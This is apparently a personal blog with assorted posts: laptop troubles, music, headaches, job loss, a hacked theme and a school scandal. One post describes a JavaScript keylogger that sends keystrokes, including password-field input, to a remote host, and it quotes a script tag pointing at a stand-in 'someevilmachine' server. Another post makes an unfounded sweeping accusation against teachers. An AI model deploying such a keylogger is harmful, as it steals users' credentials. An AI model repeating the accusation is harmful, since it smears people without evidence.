Navaho Gunleg

Hi there people!

Interesting times ahead for my pet project NG-BASIC!

After long deliberation I have decided to transfer the ownership; transfer the ownership to a new owner that is going to breathe fresh life into the project.

It shall be actively developed on — something which I can’t do anymore as I seem to be wasting more and more spare time on work.

I must say it feels weird to let go of it… I guess it’s similar to what an artist feels when he sells a painting (well I like to think so anyway).

When I initially wrote it I never expected anyone to be interested at all. Perhaps one or two like-minded people — I did not expect more for a “toy” programming language.

The emails I got and the amount of downloads over the years show differently: there’s still quite an interest in BASIC, be it because of the geekiness of it running in a browser; to quickly get some calculations done; to explain somebody the basics of a programming concept; or — for people born in the 70s and 80s — just out of pure nostalgia.

So, that’s all very cool and I’m glad that people enjoyed it and hope they will do so in the future.

I believe it will be in good hands at its new home. In a different context (read: not on my personal weblog with, for perhaps some people some non-subtle opinions) it can even reach a broader audience…

It will surely be interesting to see how it’ll develop, literally.

Farewell — may it be in for a nice ride!

So I bought myself a new laptop last November — it seemed a bargain at the time.

And I was really happy with it until the first time it did not want to boot after shutting down.

The first time I push the power button, the lights went on, the fans started to blow out some air; and then, nothing.

Second time I pushed it, it shows the BIOS booting and then, the screen clears and then… nothing.

I can push the power button again to turn it off and then the cycle repeats itself. Interestingly is that, when booting the second time, it IS possible to enter the BIOS settings (although rebooting from that shuts down the laptop again). Different settings in the BIOS, resetting to defaults, been there done that to no avail.

Thinking, hey, it’s a new laptop, perhaps something is loose (memory, etcetera). I opened the case, unseated and re-seated the memory banks. Put the thing together and it booted again.

Yay.

So I keep it running all the time, only to reboot when it’s really necessary.

The second time it happened, I reseated the memory again: no luck. I grounded myself and touched the metal things on the laptop, for any static electricity to ‘go away’.

I tried to boot: Yay!

The last time it happened, yesterday, I reseated the memory, unloaded the static electricity.

But nothing.

Googled my ass off to discover more folks having the same problem. After reading things about ‘resetting’ something power-related by pressing the power button for 30 seconds with the battery and AC detached, decided to give that a shot.

Meanwhile I had moved to laptop to another room (perhaps it was a ‘mains’ problem so tried another socket — one thinks weird things under duress *hehe*), where I had left it, battery and mains detached already incidentally. So I went upstairs, held down that button for about 60 seconds. Tried to boot.. YES it booted.

Linux mentioned stuff about clock skew detected. Oh fsck yeah, I forgot I had reset the BIOS — had even removed that button-cell battery after reading that solved stuff for some people. So I quickly shutdown again to put the date settings correctly.

I should have done that from within Linux silly me: now it didn’t want to boot again.

Same problem — and holding down the button again for 30-60 seconds didn’t do the trick this time.

Patience seems to solve everything: I left the laptop, again, AC and battery detached for I think may have been 2 hours. Tried to boot it for the heck of it and it did so without problem.

It seems that something has to cool down or something — as it works after a long time of waiting. Perhaps static electricity, I don’t know. What I do know is that at that point it is not necessary to hold down the power button for 30+ seconds anymore…

So if you have this problem, and tried everything except the ‘patience’-hack: try to occupy yourself with something else — after an hour it may well boot fine!

Hope this may help other folks out there that have been pulling their hairs out over this.

Edit: Oh, I forgot to mention I will probably not ever buy an Acer laptop again. I called their support line yesterday around 5 o’clock. Now, day later, at 11:30, I still haven’t got a call back. WTF.

Edit: Last night my laptop went into sleep mode when I disconnected the AC and closed the lid… Oh no. But this morning, having cooled down properly, it booted in one go. No tinkering with memory modules or unloading of static electricity… Patience solves it. (Problem is, you do not have patience, when you are in a hurry…)

Hey folks… It has been quiet but this I must share.

This was probably the best concert I’ve seen in my whole damn life.

Ab-so-fucking-lutely awesome.

I just caught this on guerrillafunk.com:

So after this, I have been reading more on the condition called Cluster Headaches, and the more I read, the more I recognise. Initially I couldn’t remember being woken up by these headaches, but I have. The memories of more days in agony came back. I even remember the day I had such a headache and my girlfriend thought I had a dilated pupil.

After reading about Red Bull and coffee (and other high-caffeine drinks) being possible ways to stop or prevent an attack, I have reason to suspect that my heavy coffee drinking might have played a role, though:

What if my constant coffee-drinking has always prevented the condition from getting noticed?

So as a means of experiment, I doubled my coffee-intake yesterday (I must say, it has been a while feeling that “caffeine-buzz” which I felt after only 4 mugs), to see what would happen that evening. I had one moment that I felt a headache coming up at which moment I took another mug of coffee.

I kept an eye on the clock and 20 o’clock passed without any headache at all. That seems quite promising, although it’s difficult to say whether the coffee is really helping, I might have had no painful headaches that day anyway.

(And of course, it’s still not sure that I really suffer from cluster-headaches, it could just as well be some weird coincidence.)

Today, as part of my little experiment, I’m dropping back to just 3 mugs again to see what happens.

For most of my (working) life, I have been an avid coffee-drinker almost since the day I first forced that cup down my throat out of politeness and, after a few cups thought that, “Hey that actually tastes & feels good.“.

Until, a few of months ago, my stomach started acting up on me after drinking my WTF-mug filled with coffee. Seriously thinking it was the coffee, I started to cut down on my coffee-intake from that day on.

I usually drank about 10 to 12 of those mugs and the days after that was severily reduced to about 2 or 3 mugs: one or two in the morning (to wake up), and one in the evening after dinner.

Having built up a fair dependancy on caffeine; the headaches of course started to get worse.

Somehow, the brain still longs for caffeine — or the extra water-intake that comes with it — and your body lets you know it by giving you a headache to cope with.

Now, I used to have these types of headaches a lot, especially in the weekends in which I did not drink as much coffee as I have done during the week. These headaches weren’t anything “new” to me, I have had these long enough to think that it was coffee / caffeine related: if I had them in the evening (which I used to have regularly, somewhere between 19 and 20 o’clock, I had always fingered caffeine as the one responsible.

If you have drank liters of coffee a day and suddenly reduce that to barely 1 liter of coffee, your body starts to complain, or has a change to get used to. Well, at least mine did. The first couple of weeks were relatively easy, after 2/3 weeks, I started to really feel those ‘caffeine-dependancy-headaches’ as I’ve grown to call those.

The amount and intensity of these slowly reduced, even convincing me I was on the right track cutting down on coffee because the headaches went away.

Cluster Headaches
Now, a buddy of mine has been suffering from a condition called “cluster headaches” (Wikipedia page here) for quite a while now.

Honestly, the first time I heard of this, I think must be 2 years ago by now, I did think it was similar to what I was having — but I was still too busy blaming caffeine at that point and didn’t pay it no more mind.

Recently however, the intensity of my headache now increases again: “attacks” that last for about an hour, usually a bit less but sometimes even a whole hour longer.

I also noticed a slight difference that I had not felt before: the normal “caffeine-headache” I used to have concentrated mostly in the temple — but these headaches I was also having felt like being stung by something sharp in my eyes from behind at the same time: a subtle difference that I probably haven’t noticed earlier.

So there I was, earlier this week, lying on the couch, waiting for the pain to pass, when this friend suffering from the condition coincidentally came by our house. I told him about my headache-episode I was having at that time and how it felt. He immediately recognized it — especially the stingy pain behind the eye which sometimes can be really, really painful, making you want to roll on the floor in pain…

So, it wasn’t the caffeine after all and I may have been suffering from this quite some time now. The funny thing is, I have only really starting to get bothered by it the last couple of months, where before I thought it was caffeine related, the pain didn’t seem to take me out like it does now. It seems like its intensity is increasing over time…

Oh well, I’ll see how this pans out…

Updates
13:30: I discovered www.clusterheadaches.com and the “quiz” there. If I may have been in doubt, I’m most surely not anymore…

“In between jobs“, I always have wanted to say that. I wish I could say it in another situation though…

Last month my employer went bankrupt and me and some colleagues haven’t been payed for a couple of months.

It sucks…. There’s the issue of some back-pay that I still have to get back which comes with some paperwork and requires me to go through those old-cardboard boxes I call “my past”.. Hopefully I get most of it: 3 months not getting payed kinda drains your bank-account….

So that’s what’s been up lately, I just updated my CV here and thought I’d leave this little note. Hopefully things will settle soon though, so I can finally *really* laugh about this shit.

For fun I was checking out my statistics and discovered that my theme got hacked: the footer and header were replaced, inserting spammy URLs into the outputted page, together with some Google Adsense code.

Yay.

As a result I am now delisted from Google’s index.

Apparently, this has been going on for a couple of months, but I was too busy with actual work so I never read any articles about it on the security-sites I normally occasionally visit.

Oh well, shit happens, and stuff has quickly been cleaned up (thank you, backups!) … and for safety have upgraded to the latest WordPress version. Not having upgraded a while ago, I was really just waiting for this to happen (yeh, lazy sysadmins et cetera )…

Seeing that basically the attacker could run any PHP code of his/her choice, which could include calling system binaries to retrieve information about user accounts or passwords. As I can not be a 100% sure about that at this moment, all the passwords have been reset to protect the innocent.

I am curious how long it’ll take before I get listed on Google again (as I still see Googlebot regularly visit the site)…

And… it’s not people that abuse things who harm people — it’s the people that put those things there without thinking.

An explaination: I have always been intrigued by HTML forms. As a paranoid person, I have always wondered whether companies or websites are logging keypresses to their website. Picture the situation where you want to leave feedback at a site… but finally do not hit the “Send” button because of various reasons, like, for instance, the tone was too harsh so you decide not to. For the website it could have been very useful information: unsent comment or feedback may be more valuable than the ones that are actually arriving in their inboxes.

That was quite some time ago — and I didn’t give it any more thought until recently… See, I noticed that, for instance when I have worked the whole day, or the operating system is just acting up, sometimes the wrong window has the focus, and I am happily typing away, seeing nothing appear in the window I was staring at…. (Yeh, it happens.)

Now, there could be even more valuable information! Interesting bits of text, login names — or even better, accidentally typed passwords!

With that in my paranoid mind, I started tinkering around with Javascript to see if this is actually possible… I quickly put together some rather trivial code that captures the KeyboardEvent, inspects it, and collects them all into a string. Through the body’s onunload I called a routine that displayed an alert saying something like “Hey, you left these keypresses at this website: the collected string“.

Using the onunload however has several drawbacks:
- it isn’t always called (for instance, when the browser crashes),
- it seems the body’s onunload can only be set when the document is generated, that kinda sucks if you wanted to do be able to do the keylogging by simply loading some remotely stored Javascript file.

The curious and experimenting person that I am, I realised a bad guy would be not collecting the information and printing it — but would be sending them to a remote machine. Hmm, a remote machine, so AJAX won’t do… but there are always images…. What if I dynamically create an image, with a src pointing to some other website, with the pressed character in the GET request? Nice and simple, right?

OK, so now the keylogger is loaded and active when the following line is somehow inserted into a website:

<script type=”text/javascript” src=”http://someevilmachine/wtfjs.php”></script>

This simple single script, when loaded, attaches itself to the keyPressDown event of the document, of course remembering any old setting so to be able to pass the event through to any “local” code on the target website, as an attempt to go “undetected”.

Also, modern websites have all kinds of Javascript running, and could do some additional “setting up” from Javascript from which the event handlers get set… In an attempt to take this into account, the logger attaches itself after a delay of a given amount of milliseconds. After that, the moment a keypress event is received in the window, the requests appear in the logfile on the remote website (obligatory dump follows):

GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=s HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 -

The drawback to the method currently, is that it sends a request with every keystroke made, which may be noticed by the more adept computer user… it would be possible to send collected strings at a given interval… But really, actually building a succesful keylogger isn’t the point; the point was figuring out if it is really doable (which, non-surprisingly, it is).

By the way, I’m rightly aware of the fact that I am discussing nothing really new here — this is absolutely no cutting-edge stuff. More interestingly, this has probably already been done by bad guys for ages.

On some websites with many authors that incidentally have the permission to insert Javascript, these “lower level” users could be able to catch passwords of administrative users, et cetera.

All-in-all, the only thing I am really frigging flabbergasted at, is the fact that an <input type="password"> actually sends the pressed key in a keypress event… WTF!? Knowing this, and wanting to “protect” a password entry field, I tried it by giving it its own onkeypress-handler….. I figured that it would get precendence over the documents’ keypress, but alas, it doesn’t…

It seems that there is no way to guard against this, other than to re-set your “local” event handlers regularly (which is no solution but a hack!)…

In conclusion, I really think that the password input type should somehow be prevented from putting any valid information about the pressed key into the KeyboardEvent. I know it’s used for comparing 2 passwords to validate a user’s password change for instance — but some hash could perfectly suffice there.

I am convinced the website-scripter should not ever have to have access to the real password entered in that field from Javascript — thinking that that could achieve some ‘protection’ is a flawed train of thought anyways…

Oh by the way, if you are looking for code: I will not release it here. It really isn’t difficult to cook some up yourself.

For the passed few days there’s a finch in da hood and it’s whistling it’s little feathery bum off.

It’s is now sitting on the top of my house whistling and whistling and whistling and whistling and whistling and whistling and whistling and whistling and I wonder where it gets all that energy from… The Duracell bunny ain’t got nothing on that bird!

Hey again! Long time no post, I know…. busy, life, et cetera, but this I just needed to share.

I was just reading Bruce Schneier’s CRYPTO-GRAM and he linked to this suprisingly good track (direct link to MP3) by MC Frontalot, called Secrets From The Future (direct link to the lyrics).

To quote the chorus:

You can’t hide secrets from the future with math.
You can try, but I bet that in the future they laugh
at the half-assed schemes and algorithms amassed
to enforce cryptographs in the past.

I dig it — I really, really dig it.

I posted about Everlast upcoming new album earlier, but this weekend I discovered the video for his latest track:

This song makes me want to own a car again … so that I can play this song on repeat — really, really frigging loud.

Everlast, Rap, Rock, War, Middle-East

So a couple of weeks ago I heard the news that, on my old “high-school”, a teacher was put on non-active because he was having a sex-chat with a 12 year old girl on the internet while his laptop-screen contents were beamed onto a big screen in front of the entire classroom. (Dutch article here.)

Interestingly, the school does not file a complaint against the teacher because it wasn’t the teachers intension to show it on the screen. Also, a representative of the school now downplays the stories that initially went around, especially about the girl being a minor.

Of course, these sicko’s will “protect” each-other and they will probably “share” kids between them.

This isn’t the first time this same frigging school has a child-abuse-related incident: a few kids were abused, and even one teacher was screwing with a 16 year old and another once dangled his penis in front of the entire class-room. I heard some other “vague” stories about teachers suddenly being replaced by another teacher due to a “burn-out”.

If that story ever went around your school — that a teacher had a burn-out and had to be replaced — the odds are the teacher was a frigging paedophile that loved children just a tad too much, I’m sure!

I don’t know what comedian said it first, but “anyone who likes to work with children is suspect”..

It’s been quiet for a long while … probably because I didn’t have anything to say or anything to vent… But I do so, now.

See, my girlfriend found the new site set up by Everlast (to spread the word about his new album, Love War and The Ghost of Whitey Ford, I assume) called “Martyr Inc.“. (A pretty nice design job it is, I must say.)

I just love page 3 in the Book of Life, which I can relate to as we still had obligatory military service here in the Netherlands and that P.E. song was an inspiration to me to ‘rebel’ at that time.

Anyways I thought I’d spread the link here as well, as I know some of the few readers I have are into the same music.

(Oh yeah, and a happy new year and all that.)

Recently, my MythTV box started acting ‘weird’ … initially I thought I just got a flaky SVN checkout, even after I installed a more recent version.

It was only after the machine really crashed, and one of the two encoder cards didn’t want to initialise resulting in only static coming from the card. That sucked, so I tried to reboot to no avail, the damn thing didn’t even boot. Only after removing the card the machine wanted to boot so obviously the card died.

The card was quickly removed and a replacement ordered when I noticed there was a 24-month warranty on the dead card, so this was the first time in my life I actually sent a product back to make use of such a thing.

I got word today that, indeed, the product is broken and a replacement will soon be sent to me. Woohoo!

Yeah, even though there is hardly a damn interesting thing on TV, it does occasionally occur that 3 interesting programmes are airing at the same time and we don’t have to watch those programmes live again, either.

It so effing rules to be able to skip through those annoying ads and other irritating crap — or at least to be able to not miss anything remotely important by pausing while taking a leak.